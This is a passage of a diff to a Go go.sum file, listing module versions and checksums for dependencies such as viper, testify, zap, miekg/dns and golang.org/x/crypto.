github.com/mattn/go-colorable v0.1.4 h1:snbPLB8fVfU9iwbbo30TPtbLRzwWu6aJS6Xh4eaaviA=
|
||||
github.com/mattn/go-colorable v0.1.4/go.mod h1:U0ppj6V5qS13XJ6of8GYAs25YV2eR4EVcfRqFIhoBtE=
|
||||
github.com/mattn/go-isatty v0.0.3 h1:ns/ykhmWi7G9O+8a448SecJU3nSMBXJfqQkl0upE1jI=
|
||||
github.com/magiconair/properties v1.8.6 h1:5ibWZ6iY0NctNGWo87LalDlEZ6R41TqbbDamhfG/Qzo=
|
||||
github.com/magiconair/properties v1.8.6/go.mod h1:y3VJvCyxH9uVvJTWEGAELF3aiYNyPKd5NZ3oSwXrF60=
|
||||
github.com/mattn/go-colorable v0.1.9/go.mod h1:u6P/XSegPjTcexA+o6vUJrdnUu04hMope9wVRipJSqc=
|
||||
github.com/mattn/go-colorable v0.1.12 h1:jF+Du6AlPIjs2BiUiQlKOX0rt3SujHxPnksPKZbaA40=
|
||||
github.com/mattn/go-colorable v0.1.12/go.mod h1:u5H1YNBxpqRaxsYJYSkiCWKzEfiAb1Gb520KVy5xxl4=
|
||||
github.com/mattn/go-isatty v0.0.3/go.mod h1:M+lRXTBqGeGNdLjl/ufCoiOlB5xdOkqRJdNxMWT7Zi4=
|
||||
github.com/mattn/go-isatty v0.0.8 h1:HLtExJ+uU2HOZ+wI0Tt5DtUDrx8yhUqDcp7fYERX4CE=
|
||||
github.com/mattn/go-isatty v0.0.8/go.mod h1:Iq45c/XA43vh69/j3iqttzPXn0bhXyGjM0Hdxcsrc5s=
|
||||
github.com/mattn/go-isatty v0.0.12/go.mod h1:cbi8OIDigv2wuxKPP5vlRcQ1OAZbq2CE4Kysco4FUpU=
|
||||
github.com/mattn/go-isatty v0.0.14 h1:yVuAays6BHfxijgZPzw+3Zlu5yQgKGP2/hcQbHb7S9Y=
|
||||
github.com/mattn/go-isatty v0.0.14/go.mod h1:7GGIvUiUoEMVVmxf/4nioHXj79iQHKdU27kJ6hsGG94=
|
||||
github.com/mattn/go-runewidth v0.0.2/go.mod h1:LwmH8dsx7+W8Uxz3IHJYH5QSwggIsqBzpuz5H//U1FU=
|
||||
github.com/mattn/go-runewidth v0.0.4/go.mod h1:LwmH8dsx7+W8Uxz3IHJYH5QSwggIsqBzpuz5H//U1FU=
|
||||
github.com/mattn/go-tty v0.0.0-20180219170247-931426f7535a/go.mod h1:XPvLUNfbS4fJH25nqRHfWLMa1ONC8Amw+mIA639KxkE=
|
||||
github.com/matttproud/golang_protobuf_extensions v1.0.1/go.mod h1:D8He9yQNgCq6Z5Ld7szi9bcBfOoFv/3dc6xSMkL2PC0=
|
||||
github.com/mholt/acmez v1.0.3 h1:mDgRxGYk6TKlfydYNMfX0HXXJh9i73YL+swPjYCADU8=
|
||||
github.com/mholt/acmez v1.0.3/go.mod h1:qFGLZ4u+ehWINeJZjzPlsnjJBCPAADWTcIqE/7DAYQY=
|
||||
github.com/miekg/dns v1.1.15/go.mod h1:W1PPwlIAgtquWBMBEV9nkV9Cazfe8ScdGz/Lj7v3Nrg=
|
||||
github.com/miekg/dns v1.1.22 h1:Jm64b3bO9kP43ddLjL2EY3Io6bmy1qGb9Xxz6TqS6rc=
|
||||
github.com/miekg/dns v1.1.22/go.mod h1:bPDLeHnStXmXAq1m/Ch/hvfNHr14JKNPMBo3VZKjuso=
|
||||
github.com/miekg/dns v1.1.50 h1:DQUfb9uc6smULcREF09Uc+/Gd46YWqJd5DbpPE9xkcA=
|
||||
github.com/miekg/dns v1.1.50/go.mod h1:e3IlAVfNqAllflbibAZEWOXOQ+Ynzk/dDozDxY7XnME=
|
||||
github.com/mitchellh/go-homedir v1.1.0/go.mod h1:SfyaCUpYCn1Vlf4IUYiD9fPX4A5wJrkLzIz1N1q0pr0=
|
||||
github.com/mitchellh/go-vnc v0.0.0-20150629162542-723ed9867aed/go.mod h1:3rdaFaCv4AyBgu5ALFM0+tSuHrBh6v692nyQe3ikrq0=
|
||||
github.com/mitchellh/mapstructure v1.1.2 h1:fmNYVwqnSfB9mZU6OS2O6GsXM+wcskZDuKQzvN1EDeE=
|
||||
github.com/mitchellh/mapstructure v1.1.2/go.mod h1:FVVH3fgwuzCH5S8UJGiWEs2h04kUh9fWfEaFds41c1Y=
|
||||
github.com/mitchellh/mapstructure v1.4.3 h1:OVowDSCllw/YjdLkam3/sm7wEtOy59d8ndGgCcyj8cs=
|
||||
github.com/mitchellh/mapstructure v1.4.3/go.mod h1:bFUtVrKA4DC2yAKiSyO/QUcy7e+RRV2QTWOzhPopBRo=
|
||||
github.com/modern-go/concurrent v0.0.0-20180228061459-e0a39a4cb421/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q=
|
||||
github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q=
|
||||
github.com/modern-go/reflect2 v0.0.0-20180701023420-4b7aa43c6742/go.mod h1:bx2lNnkwVCuqBIxFjflWJWanXIb3RllmbCylyMrvgv0=
|
||||
@ -185,7 +271,6 @@ github.com/nbio/st v0.0.0-20140626010706-e9e8d9816f32/go.mod h1:9wM+0iRr9ahx58uY
|
||||
github.com/nrdcg/auroradns v1.0.0/go.mod h1:6JPXKzIRzZzMqtTDgueIhTi6rFf1QvYE/HzqidhOhjw=
|
||||
github.com/nrdcg/goinwx v0.6.1/go.mod h1:XPiut7enlbEdntAqalBIqcYcTEVhpv/dKWgDCX2SwKQ=
|
||||
github.com/nrdcg/namesilo v0.2.1/go.mod h1:lwMvfQTyYq+BbjJd30ylEG4GPSS6PII0Tia4rRpRiyw=
|
||||
github.com/oklog/ulid v1.3.1/go.mod h1:CirwcVhetQ6Lv90oh/F+FBtV6XMibvdAFo93nm5qn4U=
|
||||
github.com/olekukonko/tablewriter v0.0.1/go.mod h1:vsDQFd/mU46D+Z4whnwzcISnGGzXWMclvtLoiIKAKIo=
|
||||
github.com/onsi/ginkgo v1.6.0/go.mod h1:lLunBs/Ym6LB5Z9jYTR76FiuTmxDTDusOGeTQH+WWjE=
|
||||
github.com/onsi/ginkgo v1.7.0/go.mod h1:lLunBs/Ym6LB5Z9jYTR76FiuTmxDTDusOGeTQH+WWjE=
|
||||
@ -193,36 +278,36 @@ github.com/onsi/gomega v1.4.3/go.mod h1:ex+gbHU/CVuBBDIJjb2X0qEXbFg53c61hWP/1Cpa
|
||||
github.com/openzipkin/zipkin-go v0.1.6/go.mod h1:QgAqvLzwWbR/WpD4A3cGpPtJrZXNIiJc5AZX7/PBEpw=
|
||||
github.com/oracle/oci-go-sdk v7.0.0+incompatible/go.mod h1:VQb79nF8Z2cwLkLS35ukwStZIg5F66tcBccjip/j888=
|
||||
github.com/ovh/go-ovh v0.0.0-20181109152953-ba5adb4cf014/go.mod h1:joRatxRJaZBsY3JAOEMcoOp05CnZzsx4scTxi95DHyQ=
|
||||
github.com/pelletier/go-toml v1.2.0 h1:T5zMGML61Wp+FlcbWjRDT7yAxhJNAiPPLOFECq181zc=
|
||||
github.com/pelletier/go-toml v1.2.0/go.mod h1:5z9KED0ma1S8pY6P1sdut58dfprrGBbd/94hg7ilaic=
|
||||
github.com/pelletier/go-toml v1.9.4 h1:tjENF6MfZAg8e4ZmZTeWaWiT2vXtsoO6+iuOjFhECwM=
|
||||
github.com/pelletier/go-toml v1.9.4/go.mod h1:u1nR/EPcESfeI/szUZKdtJ0xRNbUoANCkoOuaOx1Y+c=
|
||||
github.com/pierrec/lz4 v2.0.5+incompatible/go.mod h1:pdkljMzZIN41W+lC3N2tnIh5sFi+IEE17M5jbnwPHcY=
|
||||
github.com/pkg/errors v0.8.0/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0=
|
||||
github.com/pkg/errors v0.8.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0=
|
||||
github.com/pkg/errors v0.9.1 h1:FEBLx1zS214owpjy7qsBeixbURkuhQAwrK5UwLGTwt4=
|
||||
github.com/pkg/errors v0.9.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0=
|
||||
github.com/pkg/sftp v1.13.1/go.mod h1:3HaPG6Dq1ILlpPZRO0HVMrsydcdLt6HRDccSgb87qRg=
|
||||
github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=
|
||||
github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
|
||||
github.com/prometheus/client_golang v0.9.1/go.mod h1:7SWBe2y4D6OKWSNQJUaRYU/AaXPKyh/dDVn+NZz0KFw=
|
||||
github.com/prometheus/client_golang v0.9.3-0.20190127221311-3c4408c8b829/go.mod h1:p2iRAGwDERtqlqzRXnrOVns+ignqQo//hLXqYxZYVNs=
|
||||
github.com/prometheus/client_golang v0.9.3/go.mod h1:/TN21ttK/J9q6uSwhBd54HahCDft0ttaMvbicHlPoso=
|
||||
github.com/prometheus/client_golang v1.0.0/go.mod h1:db9x61etRT2tGnBNRi70OPL5FsnadC4Ky3P0J6CfImo=
|
||||
github.com/prometheus/client_golang v1.1.0/go.mod h1:I1FGZT9+L76gKKOs5djB6ezCbFQP1xR9D75/vuwEF3g=
|
||||
github.com/prometheus/client_model v0.0.0-20180712105110-5c3871d89910/go.mod h1:MbSGuTsp3dbXC40dX6PRTWyKYBIrTGTE9sqQNg2J8bo=
|
||||
github.com/prometheus/client_model v0.0.0-20190115171406-56726106282f/go.mod h1:MbSGuTsp3dbXC40dX6PRTWyKYBIrTGTE9sqQNg2J8bo=
|
||||
github.com/prometheus/client_model v0.0.0-20190129233127-fd36f4220a90/go.mod h1:xMI15A0UPsDsEKsMN9yxemIoYk6Tm2C1GtYGdfGttqA=
|
||||
github.com/prometheus/common v0.0.0-20181113130724-41aa239b4cce/go.mod h1:daVV7qP5qjZbuso7PdcryaAu0sAZbrN9i7WWcTMWvro=
|
||||
github.com/prometheus/client_model v0.0.0-20190812154241-14fe0d1b01d4/go.mod h1:xMI15A0UPsDsEKsMN9yxemIoYk6Tm2C1GtYGdfGttqA=
|
||||
github.com/prometheus/common v0.2.0/go.mod h1:TNfzLD0ON7rHzMJeJkieUDPYmFC7Snx/y86RQel1bk4=
|
||||
github.com/prometheus/common v0.4.0/go.mod h1:TNfzLD0ON7rHzMJeJkieUDPYmFC7Snx/y86RQel1bk4=
|
||||
github.com/prometheus/common v0.4.1/go.mod h1:TNfzLD0ON7rHzMJeJkieUDPYmFC7Snx/y86RQel1bk4=
|
||||
github.com/prometheus/common v0.6.0/go.mod h1:eBmuwkDJBwy6iBfxCBob6t6dR6ENT/y+J+Zk0j9GMYc=
|
||||
github.com/prometheus/procfs v0.0.0-20181005140218-185b4288413d/go.mod h1:c3At6R/oaqEKCNdg8wHV1ftS6bRYblBhIjjI8uT2IGk=
|
||||
github.com/prometheus/procfs v0.0.0-20190117184657-bf6a532e95b1/go.mod h1:c3At6R/oaqEKCNdg8wHV1ftS6bRYblBhIjjI8uT2IGk=
|
||||
github.com/prometheus/procfs v0.0.0-20190507164030-5867b95ac084/go.mod h1:TjEm7ze935MbeOT/UhFTIMYKhuLP4wbCsTZCD3I8kEA=
|
||||
github.com/prometheus/procfs v0.0.2/go.mod h1:TjEm7ze935MbeOT/UhFTIMYKhuLP4wbCsTZCD3I8kEA=
|
||||
github.com/prometheus/procfs v0.0.3/go.mod h1:4A/X28fw3Fc593LaREMrKMqOKvUAntwMDaekg4FpcdQ=
|
||||
github.com/prometheus/tsdb v0.7.1/go.mod h1:qhTCs0VvXwvX/y3TZrWD7rabWM+ijKTux40TwIPHuXU=
|
||||
github.com/rainycape/memcache v0.0.0-20150622160815-1031fa0ce2f2/go.mod h1:7tZKcyumwBO6qip7RNQ5r77yrssm9bfCowcLEBcU5IA=
|
||||
github.com/rcrowley/go-metrics v0.0.0-20181016184325-3113b8401b8a/go.mod h1:bCqnVzQkZxMG4s8nGwiZ5l3QUCyqpo9Y+/ZMZ9VjZe4=
|
||||
github.com/rogpeppe/fastuuid v0.0.0-20150106093220-6724a57986af/go.mod h1:XWv6SoW27p1b0cqNHllgS5HIMJraePCO15w5zCzIWYg=
|
||||
github.com/rogpeppe/go-charset v0.0.0-20180617210344-2471d30d28b4/go.mod h1:qgYeAmZ5ZIpBWTGllZSQnw97Dj+woV0toclVaRGI8pc=
|
||||
github.com/rogpeppe/go-internal v1.3.0/go.mod h1:M8bDsm7K2OlrFYOpmOWEs/qY81heoFRclV5y23lUDJ4=
|
||||
github.com/russross/blackfriday/v2 v2.0.1/go.mod h1:+Rmxgy9KzJVeS9/2gXHxylqXiyQDYRxCVz55jmeOWTM=
|
||||
github.com/sacloud/libsacloud v1.26.1/go.mod h1:79ZwATmHLIFZIMd7sxA3LwzVy/B77uj3LDoToVTxDoQ=
|
||||
github.com/satori/go.uuid v1.2.0/go.mod h1:dA0hQrYB0VpLJoorglMZABFdXlWrHn1NEOzdhQKdks0=
|
||||
@ -232,77 +317,125 @@ github.com/sirupsen/logrus v1.4.2/go.mod h1:tLMulIdttU9McNUspp0xgXVQah82FyeX6Mwd
|
||||
github.com/skratchdot/open-golang v0.0.0-20160302144031-75fb7ed4208c/go.mod h1:sUM3LWHvSMaG192sy56D9F7CNvL7jUJVXoqM1QKLnog=
|
||||
github.com/smartystreets/assertions v0.0.0-20180927180507-b2de0cb4f26d/go.mod h1:OnSkiWE9lh6wB0YB77sQom3nweQdgAjqCqsofrRNTgc=
|
||||
github.com/smartystreets/goconvey v0.0.0-20190330032615-68dc04aab96a/go.mod h1:syvi0/a8iFYH4r/RixwvyeAJjdLS9QV7WQ/tjFTllLA=
|
||||
github.com/soheilhy/cmux v0.1.4/go.mod h1:IM3LyeVVIOuxMH7sFAkER9+bJ4dT7Ms6E4xg4kGIyLM=
|
||||
github.com/spaolacci/murmur3 v0.0.0-20180118202830-f09979ecbc72/go.mod h1:JwIasOWyU6f++ZhiEuf87xNszmSA2myDM2Kzu9HwQUA=
|
||||
github.com/spf13/afero v1.1.2 h1:m8/z1t7/fwjysjQRYbP0RD+bUIF/8tJwPdEZsI83ACI=
|
||||
github.com/spf13/afero v1.1.2/go.mod h1:j4pytiNVoe2o6bmDsKpLACNPDBIoEAkihy7loJ1B0CQ=
|
||||
github.com/spf13/cast v1.3.0 h1:oget//CVOEoFewqQxwr0Ej5yjygnqGkvggSE/gB35Q8=
|
||||
github.com/spf13/cast v1.3.0/go.mod h1:Qx5cxh0v+4UWYiBimWS+eyWzqEqokIECu5etghLkUJE=
|
||||
github.com/spf13/jwalterweatherman v1.0.0 h1:XHEdyB+EcvlqZamSM4ZOMGlc93t6AcsBEu9Gc1vn7yk=
|
||||
github.com/spf13/jwalterweatherman v1.0.0/go.mod h1:cQK4TGJAtQXfYWX+Ddv3mKDzgVb68N+wFjFa4jdeBTo=
|
||||
github.com/spf13/pflag v1.0.3 h1:zPAT6CGy6wXeQ7NtTnaTerfKOsV6V6F8agHXFiazDkg=
|
||||
github.com/spf13/pflag v1.0.3/go.mod h1:DYY7MBk1bdzusC3SYhjObp+wFpr4gzcvqqNjLnInEg4=
|
||||
github.com/spf13/viper v1.4.0 h1:yXHLWeravcrgGyFSyCgdYpXQ9dR9c/WED3pg1RhxqEU=
|
||||
github.com/spf13/viper v1.4.0/go.mod h1:PTJ7Z/lr49W6bUbkmS1V3by4uWynFiR9p7+dSq/yZzE=
|
||||
github.com/spf13/afero v1.8.1 h1:izYHOT71f9iZ7iq37Uqjael60/vYC6vMtzedudZ0zEk=
|
||||
github.com/spf13/afero v1.8.1/go.mod h1:CtAatgMJh6bJEIs48Ay/FOnkljP3WeGUG0MC1RfAqwo=
|
||||
github.com/spf13/cast v1.4.1 h1:s0hze+J0196ZfEMTs80N7UlFt0BDuQ7Q+JDnHiMWKdA=
|
||||
github.com/spf13/cast v1.4.1/go.mod h1:Qx5cxh0v+4UWYiBimWS+eyWzqEqokIECu5etghLkUJE=
|
||||
github.com/spf13/jwalterweatherman v1.1.0 h1:ue6voC5bR5F8YxI5S67j9i582FU4Qvo2bmqnqMYADFk=
|
||||
github.com/spf13/jwalterweatherman v1.1.0/go.mod h1:aNWZUN0dPAAO/Ljvb5BEdw96iTZ0EXowPYD95IqWIGo=
|
||||
github.com/spf13/pflag v1.0.5 h1:iy+VFUOCP1a+8yFto/drg2CJ5u0yRoB7fZw3DKv/JXA=
|
||||
github.com/spf13/pflag v1.0.5/go.mod h1:McXfInJRrz4CZXVZOBLb0bTZqETkiAhM9Iw0y3An2Bg=
|
||||
github.com/spf13/viper v1.10.1 h1:nuJZuYpG7gTj/XqiUwg8bA0cp1+M2mC3J4g5luUYBKk=
|
||||
github.com/spf13/viper v1.10.1/go.mod h1:IGlFPqhNAPKRxohIzWpI5QEy4kuI7tcl5WvR+8qy1rU=
|
||||
github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
|
||||
github.com/stretchr/objx v0.1.1/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
|
||||
github.com/stretchr/testify v1.2.2/go.mod h1:a8OnRcib4nhh0OaRAV+Yts87kKdq0PP7pXfy6kDkUVs=
|
||||
github.com/stretchr/testify v1.3.0/go.mod h1:M5WIy9Dh21IEIfnGCwXGc5bZfKNJtfHm1UVUgZn+9EI=
|
||||
github.com/stretchr/testify v1.4.0 h1:2E4SXV/wtOkTonXsotYi4li6zVWxYlZuYNCXe9XRJyk=
|
||||
github.com/stretchr/testify v1.4.0/go.mod h1:j7eGeouHqKxXV5pUuKE4zz7dFj8WfuZ+81PSLYec5m4=
|
||||
github.com/stretchr/testify v1.5.1/go.mod h1:5W2xD1RspED5o8YsWQXVCued0rvSQ+mT+I5cxcmMvtA=
|
||||
github.com/stretchr/testify v1.7.0 h1:nwc3DEeHmmLAfoZucVR881uASk0Mfjw8xYJ99tb5CcY=
|
||||
github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
|
||||
github.com/subosito/gotenv v1.2.0 h1:Slr1R9HxAlEKefgq5jn9U+DnETlIUa6HfgEzj0g5d7s=
|
||||
github.com/subosito/gotenv v1.2.0/go.mod h1:N0PQaV/YGNqwC0u51sEeR/aUtSLEXKX9iv69rRypqCw=
|
||||
github.com/tidwall/btree v0.0.0-20170113224114-9876f1454cf0 h1:QnyrPZZvPmR0AtJCxxfCtI1qN+fYpKTKJ/5opWmZ34k=
|
||||
github.com/tidwall/btree v0.0.0-20170113224114-9876f1454cf0/go.mod h1:huei1BkDWJ3/sLXmO+bsCNELL+Bp2Kks9OLyQFkzvA8=
|
||||
github.com/tidwall/buntdb v1.1.0 h1:H6LzK59KiNjf1nHVPFrYj4Qnl8d8YLBsYamdL8N+Bao=
|
||||
github.com/tidwall/buntdb v1.1.0/go.mod h1:Y39xhcDW10WlyYXeLgGftXVbjtM0QP+/kpz8xl9cbzE=
|
||||
github.com/tidwall/gjson v1.3.2 h1:+7p3qQFaH3fOMXAJSrdZwGKcOO/lYdGS0HqGhPqDdTI=
|
||||
github.com/tidwall/gjson v1.3.2/go.mod h1:P256ACg0Mn+j1RXIDXoss50DeIABTYK1PULOJHhxOls=
|
||||
github.com/tidwall/gjson v1.14.0 h1:6aeJ0bzojgWLa82gDQHcx3S0Lr/O51I9bJ5nv6JFx5w=
|
||||
github.com/tidwall/gjson v1.14.0/go.mod h1:/wbyibRr2FHMks5tjHJ5F8dMZh3AcwJEMf5vlfC0lxk=
|
||||
github.com/tidwall/grect v0.0.0-20161006141115-ba9a043346eb h1:5NSYaAdrnblKByzd7XByQEJVT8+9v0W/tIY0Oo4OwrE=
|
||||
github.com/tidwall/grect v0.0.0-20161006141115-ba9a043346eb/go.mod h1:lKYYLFIr9OIgdgrtgkZ9zgRxRdvPYsExnYBsEAd8W5M=
|
||||
github.com/tidwall/match v1.0.1 h1:PnKP62LPNxHKTwvHHZZzdOAOCtsJTjo6dZLCwpKm5xc=
|
||||
github.com/tidwall/match v1.0.1/go.mod h1:LujAq0jyVjBy028G1WhWfIzbpQfMO8bBZ6Tyb0+pL9E=
|
||||
github.com/tidwall/pretty v1.0.0 h1:HsD+QiTn7sK6flMKIvNmpqz1qrpP3Ps6jOKIKMooyg4=
|
||||
github.com/tidwall/pretty v1.0.0/go.mod h1:XNkn88O1ChpSDQmQeStsy+sBenx6DDtFZJxhVysOjyk=
|
||||
github.com/tidwall/match v1.1.1 h1:+Ho715JplO36QYgwN9PGYNhgZvoUSc9X2c80KVTi+GA=
|
||||
github.com/tidwall/match v1.1.1/go.mod h1:eRSPERbgtNPcGhD8UCthc6PmLEQXEWd3PRB5JTxsfmM=
|
||||
github.com/tidwall/pretty v1.2.0 h1:RWIZEg2iJ8/g6fDDYzMpobmaoGh5OLl4AXtGUGPcqCs=
|
||||
github.com/tidwall/pretty v1.2.0/go.mod h1:ITEVvHYasfjBbM0u2Pg8T2nJnzm8xPwvNhhsoaGGjNU=
|
||||
github.com/tidwall/rtree v0.0.0-20180113144539-6cd427091e0e h1:+NL1GDIUOKxVfbp2KoJQD9cTQ6dyP2co9q4yzmT9FZo=
|
||||
github.com/tidwall/rtree v0.0.0-20180113144539-6cd427091e0e/go.mod h1:/h+UnNGt0IhNNJLkGikcdcJqm66zGD/uJGMRxK/9+Ao=
|
||||
github.com/tidwall/tinyqueue v0.0.0-20180302190814-1e39f5511563 h1:Otn9S136ELckZ3KKDyCkxapfufrqDqwmGjcHfAyXRrE=
|
||||
github.com/tidwall/tinyqueue v0.0.0-20180302190814-1e39f5511563/go.mod h1:mLqSmt7Dv/CNneF2wfcChfN1rvapyQr01LGKnKex0DQ=
|
||||
github.com/timewasted/linode v0.0.0-20160829202747-37e84520dcf7/go.mod h1:imsgLplxEC/etjIhdr3dNzV3JeT27LbVu5pYWm0JCBY=
|
||||
github.com/tmc/grpc-websocket-proxy v0.0.0-20190109142713-0ad062ec5ee5/go.mod h1:ncp9v5uamzpCO7NfCPTXjqaC+bZgJeR0sMTm6dMHP7U=
|
||||
github.com/transip/gotransip v0.0.0-20190812104329-6d8d9179b66f/go.mod h1:i0f4R4o2HM0m3DZYQWsj6/MEowD57VzoH0v3d7igeFY=
|
||||
github.com/uber-go/atomic v1.3.2/go.mod h1:/Ct5t2lcmbJ4OSe/waGBoaVvVqtO0bmtfVNex1PFV8g=
|
||||
github.com/ugorji/go v1.1.4/go.mod h1:uQMGLiO92mf5W77hV/PUCpI3pbzQx3CRekS0kk+RGrc=
|
||||
github.com/urfave/cli v1.22.1/go.mod h1:Gos4lmkARVdJ6EkW0WaNv/tZAAMe9V7XWyB60NtXRu0=
|
||||
github.com/vultr/govultr v0.1.4/go.mod h1:9H008Uxr/C4vFNGLqKx232C206GL0PBHzOP0809bGNA=
|
||||
github.com/xeipuuv/gojsonpointer v0.0.0-20180127040702-4e3ac2762d5f/go.mod h1:N2zxlSyiKSe5eX1tZViRH5QA0qijqEDrYZiPEAiq3wU=
|
||||
github.com/xeipuuv/gojsonreference v0.0.0-20180127040603-bd5ef7bd5415/go.mod h1:GwrjFmJcFw6At/Gs6z4yjiIwzuJ1/+UwLxMQDVQXShQ=
|
||||
github.com/xeipuuv/gojsonschema v1.1.0/go.mod h1:5yf86TLmAcydyeJq5YvxkGPE2fm/u4myDekKRoLuqhs=
|
||||
github.com/xiang90/probing v0.0.0-20190116061207-43a291ad63a2/go.mod h1:UETIi67q53MR2AWcXfiuqkDkRtnGDLqkBTpCHuJHxtU=
|
||||
github.com/xordataexchange/crypt v0.0.3-0.20170626215501-b2862e3d0a77/go.mod h1:aYKd//L2LvnjZzWKhF00oedf4jCCReLcmhLdhm1A27Q=
|
||||
go.etcd.io/bbolt v1.3.2/go.mod h1:IbVyRI1SCnLcuJnV2u8VeU0CEYM7e686BmAb1XKL+uU=
|
||||
github.com/yuin/goldmark v1.1.25/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74=
|
||||
github.com/yuin/goldmark v1.1.27/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74=
|
||||
github.com/yuin/goldmark v1.1.32/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74=
|
||||
github.com/yuin/goldmark v1.2.1/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74=
|
||||
github.com/yuin/goldmark v1.3.5/go.mod h1:mwnBkeHKe2W/ZEtQ+71ViKU8L12m81fl3OWwC1Zlc8k=
|
||||
go.opencensus.io v0.20.1/go.mod h1:6WKK9ahsWS3RSO+PY9ZHZUfv2irvY6gN279GOPZjmmk=
|
||||
go.opencensus.io v0.20.2/go.mod h1:6WKK9ahsWS3RSO+PY9ZHZUfv2irvY6gN279GOPZjmmk=
|
||||
go.opencensus.io v0.21.0/go.mod h1:mSImk1erAIZhrmZN+AvHh14ztQfjbGwt4TtuofqLduU=
|
||||
go.opencensus.io v0.22.0/go.mod h1:+kGneAE2xo2IficOXnaByMWTGM9T73dGwxeWcUqIpI8=
|
||||
go.opencensus.io v0.22.2/go.mod h1:yxeiOL68Rb0Xd1ddK5vPZ/oVn4vY4Ynel7k9FzqtOIw=
|
||||
go.opencensus.io v0.22.3/go.mod h1:yxeiOL68Rb0Xd1ddK5vPZ/oVn4vY4Ynel7k9FzqtOIw=
|
||||
go.opencensus.io v0.22.4/go.mod h1:yxeiOL68Rb0Xd1ddK5vPZ/oVn4vY4Ynel7k9FzqtOIw=
|
||||
go.opencensus.io v0.22.5/go.mod h1:5pWMHQbX5EPX2/62yrJeAkowc+lfs/XD7Uxpq3pI6kk=
|
||||
go.uber.org/atomic v1.3.2/go.mod h1:gD2HeocX3+yG+ygLZcrzQJaqmWj9AIm7n08wl/qW/PE=
|
||||
go.uber.org/atomic v1.4.0/go.mod h1:gD2HeocX3+yG+ygLZcrzQJaqmWj9AIm7n08wl/qW/PE=
|
||||
go.uber.org/multierr v1.1.0/go.mod h1:wR5kodmAFQ0UK8QlbwjlSNy0Z68gJhDJUG5sjR94q/0=
|
||||
go.uber.org/atomic v1.7.0/go.mod h1:fEN4uk6kAWBTFdckzkM89CLk9XfWZrxpCo0nPH17wJc=
|
||||
go.uber.org/atomic v1.9.0 h1:ECmE8Bn/WFTYwEW/bpKD3M8VtR/zQVbavAoalC1PYyE=
|
||||
go.uber.org/atomic v1.9.0/go.mod h1:fEN4uk6kAWBTFdckzkM89CLk9XfWZrxpCo0nPH17wJc=
|
||||
go.uber.org/goleak v1.1.11 h1:wy28qYRKZgnJTxGxvye5/wgWr1EKjmUDGYox5mGlRlI=
|
||||
go.uber.org/goleak v1.1.11/go.mod h1:cwTWslyiVhfpKIDGSZEM2HlOvcqm+tG4zioyIeLoqMQ=
|
||||
go.uber.org/multierr v1.6.0/go.mod h1:cdWPpRnG4AhwMwsgIHip0KRBQjJy5kYEpYjJxpXp9iU=
|
||||
go.uber.org/multierr v1.8.0 h1:dg6GjLku4EH+249NNmoIciG9N/jURbDG+pFlTkhzIC8=
|
||||
go.uber.org/multierr v1.8.0/go.mod h1:7EAYxJLBy9rStEaz58O2t4Uvip6FSURkq8/ppBp95ak=
|
||||
go.uber.org/ratelimit v0.0.0-20180316092928-c15da0234277/go.mod h1:2X8KaoNd1J0lZV+PxJk/5+DGbO/tpwLR1m++a7FnB/Y=
|
||||
go.uber.org/zap v1.10.0/go.mod h1:vwi/ZaCAaUcBkycHslxD9B2zi4UTXhF60s6SWpuDF0Q=
|
||||
go.uber.org/zap v1.21.0 h1:WefMeulhovoZ2sYXz7st6K0sLj7bBhpiFaud4r4zST8=
|
||||
go.uber.org/zap v1.21.0/go.mod h1:wjWOCqI0f2ZZrJF/UufIOkiC8ii6tm1iqIsLo76RfJw=
|
||||
golang.org/x/crypto v0.0.0-20180621125126-a49355c7e3f8/go.mod h1:6SG95UA2DQfeDnfUPMdvaQW0Q7yPrPDi9nlGo2tz2b4=
|
||||
golang.org/x/crypto v0.0.0-20180904163835-0709b304e793/go.mod h1:6SG95UA2DQfeDnfUPMdvaQW0Q7yPrPDi9nlGo2tz2b4=
|
||||
golang.org/x/crypto v0.0.0-20190211182817-74369b46fc67/go.mod h1:6SG95UA2DQfeDnfUPMdvaQW0Q7yPrPDi9nlGo2tz2b4=
|
||||
golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
|
||||
golang.org/x/crypto v0.0.0-20190418165655-df01cb2cc480/go.mod h1:WFFai1msRO1wXaEeE5yQxYXgSfI8pQAWXbQop6sCtWE=
|
||||
golang.org/x/crypto v0.0.0-20190510104115-cbcb75029529/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
|
||||
golang.org/x/crypto v0.0.0-20190605123033-f99c8df09eb5/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
|
||||
golang.org/x/crypto v0.0.0-20190701094942-4def268fd1a4/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
|
||||
golang.org/x/crypto v0.0.0-20190923035154-9ee001bba392 h1:ACG4HJsFiNMf47Y4PeRoebLNy/2lXT9EtprMuTFWt1M=
|
||||
